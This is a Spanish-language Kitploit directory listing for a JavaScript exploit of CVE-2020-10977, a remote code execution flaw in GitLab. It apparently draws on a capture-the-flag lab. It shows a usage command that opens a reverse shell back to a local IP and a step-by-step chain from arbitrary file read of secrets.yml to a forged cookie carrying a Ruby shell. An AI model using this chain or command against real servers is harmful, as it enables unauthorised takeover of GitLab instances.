Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-10977 — Gitlab v12.4.0-8.1 RCE | Kitploit
Herramientas/GitHubGitHub/liath/cve-2020-10977
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubliath/cve-2020-10977

CVE-2020-10977

Gitlab v12.4.0-8.1 RCE

Ver Repositorio
212hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

GitLab v12.4.0-12.8.1 RCE

Basado enteramente en https://github.com/dotPY-hax/gitlab_RCE, que no me funcionó y lo de parsear HTML me parecía engorroso, así que lo reescribí en js.

Uso

Inicia un manejador de reverse shell de la forma habitual y luego ejecuta este script con:

root@kitploit:~
TARGET_URI="https://target" TARGET_EMAIL_DOMAIN="laboratory.htb" \
 TARGET_USER="test" TARGET_PASSWORD="Test pass 123" \
 LOCAL_IP="10.10.14.142" LOCAL_PORT="44044" \
 node gitlab_rce.js

Se puede especificar un proxy con TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080". Burp es especialmente útil para depurar con esto.

Qué hace esto

  1. comprueba si el objetivo está activo
  2. si el usuario proporcionado existe, salta al paso 5
  3. busca un nombre de usuario que no exista ya
  4. crea ese usuario
  5. intenta iniciar sesión
  6. crea dos proyectos vacíos
  7. crea un nuevo ticket de incidencia con un enlace malicioso en su cuerpo en el primer proyecto
  8. mueve el nuevo ticket al otro proyecto, haciendo que GitLab reescriba nuestro enlace malicioso y copie el archivo al que apunta en el directorio uploads
  9. obtiene el archivo objetivo, en este caso queremos el secrets.yml para el secret_key_base
  10. usa secret_key_base para generar una cookie maliciosa con nuestro shell de Ruby y pasársela a GitLab
Descargar herramienta